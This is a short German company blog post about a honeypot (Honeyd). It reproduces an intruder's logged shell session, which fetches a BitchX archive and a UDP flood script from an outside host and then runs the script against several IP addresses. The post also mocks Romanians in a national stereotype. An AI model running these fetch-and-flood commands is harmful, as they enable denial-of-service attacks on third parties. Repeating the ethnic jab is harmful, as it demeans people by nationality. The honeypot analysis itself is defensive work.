am 11. August 2009
…dachte sich zumindest der schlaue Rumäne, als er in unseren Honigtopf (Honeyd) gefallen ist. Honeyd ist ein Tool mit dem man virtuelle Hosts emulieren kann, die beliebige Services installiert haben. Dieses haben wir im ONchestra Netz aufgesetzt und mit genau den gleichen Services konfiguriert wie unsere Produktivsysteme.
Dadurch kann man ohne Risiko testen, an welchen Stellen eifrige Skript-Kiddies und Hinterhofhacker versuchen, das System anzugreifen. Genau diese Angriffe werden aufgezeichnet und man sieht nachher schön, an welchen Stellen man den Server noch stärker abriegeln muss. Wer keine Lust hat einen Honeyd aufzusetzen, kann auch einen einfachen Virtuellen Server (OpenVZ/XENX/Whatever 2.0) nehmen und diese mit unsensiblen Daten befüllen. Allerdings sollte man dann einen Netzwork Analyzer davorschalten.
Was hat der gute Rumäne denn alles angestellt. Seht selbst:
wget extreme.ucoz.es/irc/bx-linux.tar.gz
tar xzvf bx-linux.tar.gz
chmod +x *
./BitchX
su root
exit
irssi
exit
cd /tmp
cd
wget extreme.ucoz.es/irc/udp.pl
chmod +x *
perl udp.pl 212.29.191.178 0 0
perl udp.pl 80.13.3.69 0 0
perl udp.pl 212.29.191.178 0 0
perl udp.pl 84.27.104.252 53 0
perl udp.pl 67.177.118.179 0 0
perl udp.pl 98.64.53.198 0 0
perl udp.pl 70.21.246.46 0 0
exit
Für Alle, die gerade Hüttenkäse verstehen, hier nochmal die Zusammenfassung. Er hat sich von einen Freehoster den IRC Client BitchX/Irssi und ein Perl Sktipt gezogen, welches beliebige IPs mit unnützen Daten zumüllt. Gleichzeitig lässt sich das Sktipt von außen über die bestehende IRC Verbindung steuern. Dass so eine Lösung aus Rumänien kommt wundert mich nicht, schließlich funktionieren die Dacia Logans ja nach dem gleichen Prinzip.
Jedenfalls wissen wir jetzt, über welche Services der Gute gekommen ist und können dementsprechend das System präventiv dichtmachen.
2 responses
Do you want to comment?
Comments RSS and TrackBack Identifier URI ?
Trackbacks